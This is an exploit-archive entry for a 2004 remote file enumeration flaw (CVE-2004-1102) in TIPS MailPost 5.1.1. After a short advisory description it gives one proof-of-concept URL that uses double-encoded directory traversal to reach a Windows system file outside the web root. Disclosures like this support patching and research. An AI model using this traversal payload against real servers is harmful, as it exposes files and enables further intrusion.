TIPS MailPost 5.1.1 - Remote File Enumeration
| EKU-ID: 30100 | CVE: CVE-2004-1102;OSVDB-11410 | OSVDB-ID: |
| Author: Gemma Hughes | Published: 2004-11-03 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 30100 | CVE: CVE-2004-1102;OSVDB-11410 | OSVDB-ID: |
| Author: Gemma Hughes | Published: 2004-11-03 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/11599/info TIPS MailPost is affected by a remote file enumeration vulnerability. This issue is due to a failure to properly sanitize user requests. An attacker may leverage this issue to gain knowledge of the existence of files outside the Web root directory. Information disclosed in this way may facilitate further attacks. http://www.example.com/scripts/mailpost.exe/..%255c..%255c..%255cwinnt/system.ini?*nosend*=&email=test@procheckup.com